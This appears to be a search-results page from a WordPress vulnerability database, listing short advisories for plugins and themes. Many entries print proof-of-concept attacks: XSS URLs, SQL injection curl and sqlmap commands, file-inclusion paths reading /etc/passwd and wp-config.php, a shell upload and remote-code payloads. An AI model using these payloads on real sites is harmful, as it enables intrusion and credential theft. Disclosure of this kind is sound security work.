4359 matches found
Newsletter Manager < 1.5 - Unauthenticated Open Redirect
The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header PHP function, leading to an open redirect issue. In the file '/newsletter-manager/confirmation.php': 33: $xyzemurl = base64_decode($_GET['appurl']); ... 179:...
W3 Total Cache <= 0.9.7.3 - Blind SSRF and RCE via phar
The implementation of opcache_flush_file calls file_exists with a parameter fully controlled by the user. curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flushfile&file=ftp://y.y.y.y:zzzz/' Note: The nonce value is given ...
W3 Total Cache <= 0.9.7.3 - Cross-Site Scripting (XSS)
The W3 Total Cache WordPress plugin was affected by a Cross-Site Scripting (XSS) security vulnerability. alert1"...
Travel Booking < 2.7.8.4 - Reflected & Stored XSS
Weak security measures, like no data filtering on input & textarea fields, have been discovered in the 'Traveler - Travel Booking WordPress Theme'. Special Notes: 1 - The 'Change Avatar' upload field works really strangely. E.g., you can upload any .PHP file with the extension .php.png and break the profile page. Serve...
Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting (XSS)
The Blog Designer WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) security vulnerability. Send a POST request to: /wp-admin/admin-ajax.php?action=save&updated=true with the request body: customcss=confirm1...
Share This Image <= 1.19 - Stored XSS
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. Go to the Share This Image menu, and put " in the Selector field from the "What to Share" secti...
My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)
Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. http://www.domain.de/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%2FOPENBUGBOUNTY%2F%3E...
JobCareer < 2.5.1 - Authenticated Stored Cross-Site Scripting
Bad input field data filtering has been discovered in the 'JobCareer | Job Board Responsive WordPress Theme'. http://jobcareer.chimpgroup.com/candidate/asdasdasdasdasd/ Register a new account on the demo website: http://jobcareer.chimpgroup.com/ , then go to the «Resume» profile tab:...
CarSpot Theme <= 2.1.6 - Authenticated Stored XSS
Bad input field data filtering has been discovered in the 'CarSpot – Automotive Car Dealer Wordpress Classified Theme'. The current version of this Premium Theme is 2.1.5. Authorize on the demo website for tests: https://carspot.scriptsbundle.com/, login is [email protected] and password i...
Download Manager <= 2.9.93 - Authenticated Cross-Site Scripting (XSS)
In the pro features of the WordPress Download Manager plugin, there is a Category Short-code feature which can be used to sort categories by a function, used as ?orderby=title,publishdate . By adding the parameter " and any XSS payload, the XSS payload will execute. To...
WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection
The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue. curl -k --silent "http://example.com/index.php?rest_route=/wpgmza/v1/markers/&filter=%7B%7D&fields=+from+wp_users+--+-"...
Social Media & Share Icons <= 2.1.7 - Multiple Issues
The Social Media Share Buttons & Social Sharing Icons WordPress plugin was affected by multiple security vulnerabilities. https://plugins.trac.wordpress.org/browser/ultimate-social-media-icons/tags/2.1.7/libs/controllers/sfsi_buttons_controller.php#L877...
Loco Translate < 2.2.2 - Authenticated LFI
The Loco Translate WordPress plugin appears to have an Authenticated LFI vulnerability under the 'Edit Template' functionality. The vulnerability can be exploited by any user with access to the plugin (access can range from Admin to Subscriber). WPScanTeam Note: Was not able to reprodu...
Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)
Unauthenticated remote code execution has been discovered in the functionality that handles settings import. 1. Create a payload file and host it on a location accessible by the targeted website. Payload content: "system('cat /etc/passwd')" 2. Visit...
Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update
Description: The library, used in numerous plugins, does not have proper authorisation when updating blog options, allowing any authenticated user, such as a subscriber, to update arbitrary options. As any authenticated user: Enable new user registrations:...
Ultimate Membership Pro <= 7.5 - Arbitrary media upload
The ajax-upload.php endpoint doesn't check the current user's capabilities, or even that they are logged in, so we can do a few things we shouldn't be able to do: Without any credentials, you can simply POST the image file in the field ihcfile and it'll store it for you: $ curl -F...
Ultimate Membership Pro 7.4.2 <= 7.5 - Arbitrary media include
In addition to cropping/rotating/resizing an image of your choosing, you can abuse the imgUrl feature on versions where it's available (7.4.2+ at least) to make an HTTP request to any site you want. For example, by having it connect to a site you control, you can determine the IP address of the...
Advanced Custom Fields <= 5.7.10 - Unserialize of user input
Multiple maybe_unserialize() calls result in unserialize() of user input. Exploitable by low privileged users such as contributors, but in many cases by visitors too. https://medium.com/websec/wordpress-acf-5-7-10-unserialize-of-user-input-ac17cc473e0d...
Quiz And Survey Master < 6.2.2 - Authenticated Cross-Site Scripting (XSS)
The Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress WordPress plugin was affected by an Authenticated Cross-Site Scripting (XSS) security vulnerability. http://example.com/wp-admin/admin.php?page=mlwquizresults&quizid=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E...
Contact Form Email <= 1.2.65 - Multiple Cross-Site Scripting (XSS) & CSRF
The Contact Form Email WordPress plugin was affected by Multiple Cross-Site Scripting (XSS) & CSRF security vulnerabilities. http://www.example.com/wp-admin/admin.php?page=cpcontactformtoemail&edit=1&cal=1&item='"...
Blog2Social <= 5.0.2 - Authenticated Cross-Site Scripting (XSS)
The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin was affected by an Authenticated Cross-Site Scripting (XSS) security vulnerability. http://example.com/wp-admin/admin.php?page=blog2social-ship&postId=70&b2saction=1&b2supdatepublishdate='"...
User Registration <= 1.5.5 - Authenticated Cross-Site Scripting (XSS)
The User Registration – Custom Registration Form, Login And User Profile For WordPress WordPress plugin was affected by an Authenticated Cross-Site Scripting (XSS) security vulnerability...
MapSVG Lite <= 3.2.3 - Cross-Site Request Forgery (CSRF)
CSRF in the mapsvgsave AJAX method...
JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)
The jsmol2wp WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability. http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert/xss/%3C/script%3E&mimetype=text/html;%20charset=utf-8...
JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)
The jsmol2wp WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability. http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php...
WP AutoSuggest 0.24 - Unauthenticated SQL Injection
The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability. sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpasaction=query&wpaskeys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpaskeys --tamper space2comment...
Master Slider <= 3.7.0 - Authenticated Stored Cross-Site Scripting (XSS)
The plugin does not properly sanitise the slider name when creating or editing a slider, leading to an Authenticated (editor+) Stored Cross-Site Scripting issue which will be triggered in the Slider table at /wp-admin/admin.php?page=master-slider. Edit WPScanTeam: - The original report was from 2018,...
WP GDPR Compliance <= 1.4.2 - Unauthenticated Call Any Action or Update Any Option
The WP GDPR Compliance plugin allows unauthenticated users to execute any action and to update any database value. If the request data form is available to unauthenticated users, even unauthenticated users are able to do this. See references for discussion of the issue. The problem is in the fil...
Better WordPress reCAPTCHA <= 2.0.3 - Unauthenticated Cross-Site Scripting (XSS)
There is a reflected XSS vulnerability in the Better WordPress reCAPTCHA plugin version 2.0.3, and possibly below. The value of the cerror parameter is reflected in the page when this plugin is enabled. Once the plugin is disabled, the "cerror" parameter's value is no longer reflected in the page. This is the HT...
Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities
Following the PoC, you can combine the vulnerabilities to obtain PHP code execution and read sensitive files. By default the File Manager can only be used by Administrator users; however, any user role can be configured to use it. Directory Traversal: POST /wordpress/wp-admin/admin-ajax.php HTTP/1....
Calendar <= 1.3.10 - Authenticated Stored Cross-Site Scripting (XSS)
This WordPress plugin allows remote authenticated users, without the unfiltered_html capability, to execute JavaScript code through a stored XSS attack. The plugin by default is available to users with contributor or higher privileges. POC 1: You can inject JavaScript code into the event title when...
Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) vulnerability in the JSON output by modifying the hash parameter in admin-ajax.php using the fetchposts action. The response Content-Type is set to html. http://www.example.com/wp-admin/admin-ajax.php?action=fetchposts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert1%3E...
Pie Register <= 3.0.17 - Unauthenticated Cross-Site Scripting (XSS)
The Pie Register – User Registration Forms. Invitation based registrations, Custom Login, Payments WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability. http://www.website.com/wordpress/index.php/forgot-password/?"alert1...
Tajer - Unauthenticated Arbitrary File Upload
The tajer WordPress plugin was affected by an Unauthenticated Arbitrary File Upload security vulnerability. curl -F "[email protected]" http://www.example.com/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php Shell is uploaded to:...
WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
The sitepress-multilingual-cms WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) security vulnerability. POST /wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 Windows NT 6.1...
Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass
The Wordfence Security – Firewall & Malware Scan WordPress plugin was affected by a Username Enumeration Prevention Bypass security vulnerability. Wordfence blocks: http://www.example.com/?author=1 But allowed: http://www.example.com/?author=1...
Breadcrumb NavXT <= 6.1.0 - Username Disclosure via REST API
The Breadcrumb NavXT WordPress plugin was affected by a Username Disclosure via REST API security vulnerability. http://www.example.com/wp-json/bcn/v1/author/1...
Wechat Broadcast <= 1.2.0 - Local/Remote File Inclusion
This bug was found in the file: /wechat-broadcast/wechat/Image.php echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : ''); The parameter "url" is not sanitized, allowing the inclusion of local or remote files. To exploit the vulnerability, it is only necessary to use version 1.0 of the HTTP protocol to interact...
Localize My Post 1.0 - Unauthenticated Local File Inclusion (LFI)
The localize-my-post WordPress plugin was affected by an Unauthenticated Local File Inclusion (LFI) security vulnerability. http://www.example.com/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd...
File Manager < 3.1 - CSRF to Stored Cross-Site Scripting
The plugin lacks CSRF as well as sanitisation checks, allowing attackers to perform CSRF attacks against logged in administrators and set an XSS payload in the publicpath setting...
File Manager < 3.0 - Authenticated Reflected Cross-Site Scripting (XSS)
Lack of sanitisation in the lang parameter in the admin dashboard could allow an attacker to perform reflected XSS attacks against logged in administrators. https://example.com/wp-admin/admin.php?page=wpfilemanager&lang=zhCNalertXSS...
Duplicator <= 1.2.40 - Unauthenticated Arbitrary Code Execution
If the installer files, installer.php and installer-backup.php, are not removed by the administrators, a code injection during the database setup step allows executing arbitrary code on the server. actionajax=3&actionstep=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=test';...
Image Intense <= 3.2.5 - Authenticated SQL Injection in shortcodes
The vendor does not consider it to be a vulnerability; it remains unfixed. SQL Injection in the handling of the "etpbimagen10s" shortcode. The last version at the time of the original advisory, 3.2.5, is known to be affected. etpbsection bbbuilt="1"etpbrowetpbcolumn type="44"etpbimagen10s...
UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)
An XSS vulnerability that affects versions 2.13 to 4.9.23. POST /wp-admin/admin-ajax.php Host: domain.com action=userproshortcodetemplate&shortcode=userpro id=1 layout="float" collageperpage="20" emdpaginatetop="1" emdpaginate="1" emdgender="Gender,radi...
Gift Voucher <= 4.1.1 - Unauthenticated Blind SQL Injection
The wpgvdoajaxfronttemplate AJAX action (both authenticated and unauthenticated), defined in front.php, does not sanitise, validate or escape the templateid parameter before using it in a SQL statement, leading to a SQL Injection issue. This has been present since at least 1.0.5 (v4.1.0 tried to...
Supreme Directory Theme <= 1.1.8 - Unauthenticated Cross-Site Scripting (XSS)
This theme has a parameter, s, that allows executing an XSS payload: " 1. Install the theme 2. Access the website in another browser 3. Enter this URI: website.com/?s="alert0...
Chained Quiz <= 1.0.8 - Unauthenticated SQL Injection
The WordPress plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters. Technical details: Chained Quiz appears to be vulnerable to time-based SQL injection. The issue lies in the "$answer" backend variable...
Export Users to CSV <= 1.1.1 - CSV Injection
The WordPress Export Users to CSV plugin versions 1.1.1 and before are affected by Remote Code Execution through a CSV injection vulnerability. This allows an application user to inject commands as part of the fields of their profile; these commands are executed when a user with greater privilege...
Multi Step Form <= 1.2.5 - Multiple Unauthenticated Reflected XSS
The WordPress plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through Reflected XSS attacks. This issue can be exploited by unauthenticated attackers, by the use of CSRF for example. The following parameters are vulnerable in the fwsenddata function: fwdataid1 fwdataid...
All In One Favicon <= 4.6 - Multiple Stored Authenticated XSS
Authenticated Stored Cross-Site Scripting (XSS) in 8 parameters: backendApple-Text backendGIF-Text backendICO-Text backendPNG-Text frontendApple-Text frontendGIF-Text frontendICO-Text frontendPNG-Text " "...